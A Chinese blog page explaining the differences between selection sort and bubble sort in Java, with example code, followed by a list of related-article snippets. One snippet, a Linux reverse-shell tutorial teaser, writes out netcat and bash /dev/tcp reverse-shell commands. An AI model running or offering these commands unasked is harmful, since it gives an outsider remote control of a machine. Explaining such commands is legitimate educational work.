当前位置: 首页 > news >正文

java选择排序和冒泡排序

1.区别

选择排序和冒泡排序的区别主要在于算法逻辑、稳定性和交换成本。

  1. 算法逻辑:选择排序和冒泡排序都属于比较排序,但在具体算法逻辑上有所不同。冒泡排序是通过相邻元素之间的比较和交换,将较大(或较小)的元素逐渐“冒泡”到数组的一端。选择排序则是先选择后交换,在一轮比较中,将最大(或最小)的元素与数组的末尾元素交换,然后在剩余的元素中继续选择和交换。
  2. 稳定性:冒泡排序是稳定的排序算法,即相等的元素的顺序不会改变。而选择排序是不稳定的排序算法,因为元素的相对顺序可能会在排序过程中发生改变。
  3. 交换成本:在交换成本方面,选择排序相较于冒泡排序有优势。冒泡排序需要相邻元素之间的比较和交换,而选择排序只需要记录下标,一轮比较结束后才进行数据的调换,因此选择排序的交换次数要少于冒泡排序。

总的来说,选择排序和冒泡排序各有其特点,需要根据具体需求和数据量来选择使用哪种排序算法。

public class ArrayTest {public static void main(String[] args) {MyTools mt = new MyTools();int[] arr = {10, -1, 8, 0, 34};mt.bubble(arr);//输出快捷键soutSystem.out.println("===冒泡排序后的arr===");for(int i = 0; i < arr.length; i++) {System.out.print(arr[i] + "\t");}mt.selectionSort(arr);System.out.print("\n");System.out.println("===选择排序后的arr===");for(int i = 0; i < arr.length; i++) {System.out.print(arr[i] + "\t");}}
}//创建一个类MyTools,完成int数组升序排序的功能
class MyTools {public void bubble(int[] arr) {int temp = 0;for(int i = 0; i < arr.length; i++) {for (int j = 0; j < arr.length - 1 -i; j++) {if(arr[j] > arr[j+1]) {temp = arr[j];arr[j] = arr[j + 1];arr[j + 1] = temp;}}}}public void selectionSort(int[] arr) {for (int i = 0; i < arr.length; i++) {int minValIdx = i;for (int j = i + 1; j < arr.length; j++) {if (arr[minValIdx] > arr[j]) {minValIdx = j;}}int temp = arr[minValIdx];arr[minValIdx] = arr[i];arr[i] = temp;}}
}

运行结果:

相关文章:

java选择排序和冒泡排序

1.区别 选择排序和冒泡排序的区别主要在于算法逻辑、稳定性和交换成本。 算法逻辑&#xff1a;选择排序和冒泡排序都属于比较排序&#xff0c;但在具体算法逻辑上有所不同。冒泡排序是通过相邻元素之间的比较和交换&#xff0c;将较大&#xff08;或较小&#xff09;的元素逐…...

linux反弹shell

nc工具反弹shell 下面是windows主机找到nc打开1.bat输入&#xff1a;nc 连接的IP地址 端口 受害主机是nc -lvvp 端口 -t -e /bin/bash kali系统连接 bash命令反弹 本地 nc -l -p 端口&#xff0c; 受害主机 bash -i >& /dev/tcp/要连接的主机IP/端口 0>&1 注…...

Go字符串类型

一、字符串 1、字符串 Go 语言里的字符串的内部实现使用 UTF-8 编码字符串带的值为双引号&#xff08;"&#xff09;中的内容&#xff0c;可以在 Go 语言的源码中直接添加非ASCII 码字符 s1 : "hello" s2 : "您好" 2、字符串转义符 Go 语言的字符…...

DjiTello + YoloV5的无人机的抽烟检测

一、效果展示 注&#xff1a;此项目纯作者自己原创&#xff0c;创作不易&#xff0c;不经同意不给予搬运权限&#xff0c;转发前请联系我&#xff0c;源码较大需要者评论获取&#xff0c;谢谢配合&#xff01; 1、未启动飞行模型无人机的目标检测。 DjiTello YOLOV5抽烟检测 …...

数据库取多个时间字段的最大值

个人网站 要在数据库中取多个时间字段的最大值&#xff0c;可以使用SQL的GREATEST函数。假设有一个表my_table&#xff0c;其中有两个时间字段time1和time2&#xff0c;可以使用以下查询来获取这两个字段的最大值&#xff1a; SELECT GREATEST(time1, time2) AS max_time FRO…...

C/C++ 实现Socket交互式服务端

在 Windows 操作系统中&#xff0c;原生提供了强大的网络编程支持&#xff0c;允许开发者使用 Socket API 进行网络通信&#xff0c;通过 Socket API&#xff0c;开发者可以创建、连接、发送和接收数据&#xff0c;实现网络通信。本文将深入探讨如何通过调用原生网络 API 实现同…...

kotlin 防范竞态

当你调用成员&#xff0c;这个成员可能为null&#xff0c;可能为空值&#xff0c;就必须采用防范竞态条件&#xff0c;这个是 KT 编程的规范化 下面举例&#xff1a; 防范竞态条件【尽量使用 &#xff1f; 内置函数 空合并操作符】 fun test(){val info: String ? "&q…...

超分辨率重建

意义 客观世界的场景含有丰富多彩的信息&#xff0c;但是由于受到硬件设备的成像条件和成像方式的限制&#xff0c;难以获得原始场景中的所有信息。而且&#xff0c;硬件设备分辨率的限制会不可避免地使图像丢失某些高频细节信息。在当今信息迅猛发展的时代&#xff0c;在卫星…...

防止恶意攻击,服务器DDoS防御软件科普

作为一种恶意的攻击方式&#xff0c;DDoS攻击正以超出服务器承受能力的流量淹没网站&#xff0c;让网站变得不可用。近几年&#xff0c;这种攻击持续增多&#xff0c;由此优秀服务器DDoS防御软件的需求也随之增长。那么如何选择服务器DDoS防御软件&#xff0c;从根本上根除DDoS…...

nint和Pattern matching介绍(C#)

nint 最近看C# 9.0时&#xff0c;发现一个有意思的关键词&#xff0c;就是nint&#xff0c;第一次看到这个&#xff0c;于是好奇心爆棚&#xff0c;就去实际操作了一下。 nint i 1000; Console.WriteLine("i{0}", i);实际结果与int的结果是一样的&#xff0c;那为什…...

部署jenkins一直显示Please wait while Jenkins is getting ready to work

部署jenkins一直显示Please wait while Jenkins is getting ready to work … 需要你进入jenkins的工作目录 vim .jenkins/hudson.model.UpdateCenter.xml将https://updates.jenkins.io/update-center.json更换为更改为https://mirrors.tuna.tsinghua.edu.cn/jenkins/updates…...

Redis性能压测、监控工具及优化方案

Redis是一款高性能的开源缓存数据库&#xff0c;但是在实际应用中&#xff0c;我们需要对Redis进行性能压测、监控以及优化&#xff0c;以确保其稳定性和高可用性。本文将介绍Redis性能压测、监控工具及优化方案。 01 Redis性能压测 常用的Redis性能压测工具有&#xff1a; …...

使用NVM管理多个Nodejs版同时本支持vue2、vue3

1.安装nvm,下载地址&#xff1a; https://github.com/coreybutler/nvm-windows/releases/tag/1.1.12 2.nvm常用命令 Usage:nvm arch : Show if node is running in 32 or 64 bit mode.nvm current : Display active version.nvm debug …...

局域网的网络ip不稳定问题

在局域网的多个设备&#xff0c;互相通信时好时坏&#xff0c;不稳定。 遭遇过的情况如下&#xff1a; 用两个开发板&#xff1a;972开发板1和2&#xff0c;网口同时互相ping&#xff0c;出现1ping 2通--此时2ping 1不通&#xff0c;过段时间&#xff0c;1ping2不通--但2ping又…...

uniapp (vue3)生成二维码

在uni-app中生成二维码&#xff0c;我们可以使用第三方库qrcode.js。以下是一个简单的示例&#xff1a; 首先&#xff0c;我们需要安装qrcode.js库&#xff0c;可以通过npm进行安装&#xff1a; npm install qrcode然后&#xff0c;在你的Vue组件中引入并使用这个库&#xff…...

Android11编译第八弹:root用户密码设置

问题&#xff1a;user版本增加su 指令以后&#xff0c;允许切换root用户&#xff0c;但是&#xff0c;root用户默认没有设置密码&#xff0c;这样访问不安全。 需要增加root用户密码。 一、Linux账户管理 1.1 文件和权限 Linux一切皆文件。文件和目录都有相应的权限&#x…...

XML Schema中的attributeFormDefault

XML Schema中的attributeFormDefault属性&#xff0c;用以指定元素的属性默认是否必须带有命名空间前缀。 attributeFormDefault属性可以取值qualified或unqualified&#xff0c;默认值是unqualified。 当取值为qualified时&#xff0c;表示属性必须用命名空间作为前缀&#x…...

数据结构 / 结构体字节计算

1. 结构体的存储 结构体各个成员的地址是连续的结构体变量的地址是第一个成员的地址 2. 64位操作系统8字节对齐 结构体的总字节大小是各个成员字节的总和&#xff0c;字节的总和需要是最宽成员的倍数结构体的首地址是最宽成员的倍数结构体各个成员的偏移量是该成员字节的倍数…...

rancher2.6 docker版本部署

1. 拉取镜像 docker pull rancher/rancher:v2.6.5 注&#xff1a; 上面命令中rancher的版本v2.6.5&#xff0c;仅仅是我因为我们环境中使用的k8s都是 1.20.1 到1.23.6 之间的版本。rancher支持的k8s版本&#xff0c;在github上查看&#xff1a;Release Release v2.6.5 ranche…...

UE5人物残影学习(材质实现)

学习视频 UE4简单的材质球残影人教学&#xff0c;你学会了吗&#xff01;_哔哩哔哩_bilibilihttps://www.bilibili.com/video/BV1rY411q7Yb/?spm_id_from333.788.top_right_bar_window_history.content.click 结果预览 1.创建残值&#xff0c;混合模式勾选半透明 “混合模…...

PVE Tools 深度解析:从手动配置到自动化管理的虚拟化效率革命

PVE Tools 深度解析&#xff1a;从手动配置到自动化管理的虚拟化效率革命 【免费下载链接】pvetools proxmox ve tools script(debian9 can use it).Including email, samba, NFS set zfs max ram, nested virtualization ,docker , pci passthrough etc. for english user,ple…...

Qwen3.5-4B-Claude-Opus-GGUF惊艳效果:动态规划问题的状态转移方程推导

Qwen3.5-4B-Claude-Opus-GGUF惊艳效果&#xff1a;动态规划问题的状态转移方程推导 1. 模型能力概述 Qwen3.5-4B-Claude-4.6-Opus-Reasoning-Distilled-GGUF是一个专注于推理和逻辑分析的AI模型&#xff0c;特别擅长处理需要分步骤解答的复杂问题。这个模型基于Qwen3.5-4B架构…...

美黄金到底是个啥

只要聊黄金投资&#xff0c;就绕不开一个词&#xff1a;美黄金。很多人以为它是 “美国的黄金”&#xff0c;其实不是。今天小编通俗易懂的方式&#xff0c;把美黄金讲清楚。一、美黄金到底是什么&#xff1f; 美黄金&#xff0c;全称COMEX 黄金期货&#xff0c;是在纽约商品交…...

Qsign签名API终极指南:5分钟搭建稳定QQ协议签名服务

Qsign签名API终极指南&#xff1a;5分钟搭建稳定QQ协议签名服务 【免费下载链接】Qsign Windows的一键搭建签名api 项目地址: https://gitcode.com/gh_mirrors/qs/Qsign Qsign是一个专为Windows系统设计的签名API一键搭建包&#xff0c;能够帮助开发者快速构建QQ协议签名…...

Dify插件安装避坑指南:如何快速搞定Markdown转换器的依赖问题

Dify插件安装避坑指南&#xff1a;如何快速搞定Markdown转换器的依赖问题 当你正准备在Dify平台上部署Markdown转换器插件时&#xff0c;突然弹出的依赖错误提示可能会让整个项目进度陷入停滞。这类问题往往出现在最不合时宜的时刻——可能是深夜赶工&#xff0c;也可能是演示前…...

ROS2 Nav2插件化实践:从零构建自定义全局与局部规划器

1. ROS2 Nav2插件化架构深度解析 第一次接触Nav2的插件系统时&#xff0c;我完全被它的灵活性震惊了。这就像乐高积木一样&#xff0c;你可以随意替换导航系统的各个模块&#xff0c;而不用重新编译整个框架。这种设计让我想起小时候玩的插卡游戏机&#xff0c;不同卡带插进去…...

身份管理化技术用户生命周期与权限回收

身份管理化技术&#xff1a;用户生命周期与权限回收的智能治理 在数字化时代&#xff0c;企业面临用户身份与权限管理的复杂挑战。身份管理化技术通过自动化流程&#xff0c;实现从用户入职到离职的全生命周期管控&#xff0c;确保权限分配精准、回收及时&#xff0c;成为企业…...

进程控制总结

文章目录1. 进程创建2. 进程终止3. 进程等待4. 进程替换4.1 exec 系列函数4.2 替换原理1. 进程创建 在Linux系统中fork()函数是非常重要的函数&#xff0c;它用来在一个已经存在的进程中创建一个新的进程。新进程成为子进程&#xff0c;原进程称为父进程。 // #include <u…...

LinkSwift:八大网盘直链解析工具的现代化技术实现指南

LinkSwift&#xff1a;八大网盘直链解析工具的现代化技术实现指南 【免费下载链接】Online-disk-direct-link-download-assistant 一个基于 JavaScript 的网盘文件下载地址获取工具。基于【网盘直链下载助手】修改 &#xff0c;支持 百度网盘 / 阿里云盘 / 中国移动云盘 / 天翼…...

Qwen3-0.6B-FP8惊艳效果:同一问题不同Temperature下的创造性梯度展示

Qwen3-0.6B-FP8惊艳效果&#xff1a;同一问题不同Temperature下的创造性梯度展示 你有没有想过&#xff0c;同一个问题问AI&#xff0c;为什么每次的回答都不一样&#xff1f;有时候它回答得严谨认真&#xff0c;有时候又天马行空充满创意&#xff1f; 这背后其实有个关键的“…...